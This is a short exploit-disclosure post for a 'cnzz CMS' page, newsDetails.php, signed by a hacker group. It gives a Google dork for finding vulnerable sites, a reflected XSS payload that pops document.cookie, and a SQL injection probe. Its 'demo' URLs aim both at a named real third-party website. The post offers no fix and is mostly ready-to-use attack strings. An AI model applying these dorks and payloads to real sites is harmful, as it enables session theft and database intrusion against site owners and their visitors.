cnzz CMS (newsDetails.php) XSS | SQLi

2013-12-19 20:36:28
Inviato da: JoKeR_StEx

##################################################################################

[~] Exploit Title : cnzz CMS (newsDetails.php) XSS | SQLi
[~] Author : JoKeR_StEx
[~] Tested on : WinXP Pro SP3
[~] Version : 1.2
[~] Software Link : http://www.cnzz.com/
[~] Date : 18/12/2013

##################################################################################

###############
# JoKeR_StEx #
###############

####################################################################################

# Google Dork : inurl:"/en/newsDetails.php?id="

1| The First Vulnerability is XSS

http://site/en/newsDetails.php?id=[XSS]

#Demo

http://www.ippotour.gr/en/newsDetails.php?id="><script>alert(document.cookie)</script>


2| Sql injection


http://site/en/newsDetails.php?id=2[Sqli]

#Demo

http://www.ippotour.gr/en/newsDetails.php?id=2'

## The #End :)

#####################################################################################
# eXPLOIT BY JoKeR_StEx <3 Dz Crazy L33ts <3 Algeria
# The Black Devils
# Sec W0rms
#####################################################################################

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.